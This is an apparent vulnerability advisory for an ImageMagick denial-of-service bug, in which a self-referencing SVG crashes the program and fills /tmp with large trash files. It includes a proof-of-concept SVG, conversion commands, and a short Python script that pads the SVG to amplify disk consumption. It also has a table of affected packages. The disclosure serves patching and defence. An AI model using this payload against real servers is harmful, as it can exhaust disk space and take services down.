Asymmetric denial of service In imagemagick
Description
ImageMagick: Specially crafted SVG leads to segmentation fault and generate trash files in "/tmp", possible to leverage DoS
Summary
Specially crafted SVG file make segmentation fault and generate trash files in "/tmp", possible to leverage DoS.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara)
Tested ImageMagick version
6.9.11-60, 7.1.0-62
Details
A specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file.
It seems that this error affects a lot of websites and causes a generating trash files in /tmp when uploading this PC file to the server.
I think it's better to check the file descriptor coming from itself before executing read().
PoC
Generate SVG file:
<!DOCTYPE test> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <image height="200" width="200" xlink:href="bad.svg" /> </svg>
Run some commands for verification:
$./magick --version Version: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.5) Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib Compiler: gcc (7.5) $./magick convert -verbose -font OpenSymbol bad.svg t.jpg...
Impact
Possible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action.
Additional impact
In DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G.
Example:
$cat dos_poc.py open("bad_dos.svg", "w").write("""<?xml version="1.0"?> <?xml-stylesheet href="https://example.com/style.xsl" type="text/xsl" ?> <!DOCTYPE test> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <image height="200" width="200" href="bad_dos.svg"""" + "0"*(1024*1021) + """"" /> </svg>""") $rm -rf /tmp/magick-*...
P. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 debian 12 | 8:6.9.11.60+dfsg-1.6+deb12u1 | ||
debian 14 | 8:6.9.12.98+dfsg1-2 | ||
debian 13 | 8:6.9.12.98+dfsg1-2 | ||
debian 11 | 8:6.9.11.60+dfsg-1.3+deb11u3 | ||
 nuget | 13.0.0 | ||
nuget | 13.0.0 | ||
nuget | 13.0.0 | ||
nuget | 13.0.0 | ||
 rpm rhel6 | - | - | |
rpm rhel7 | - | - |
1-10 of 25
10
Aliases
References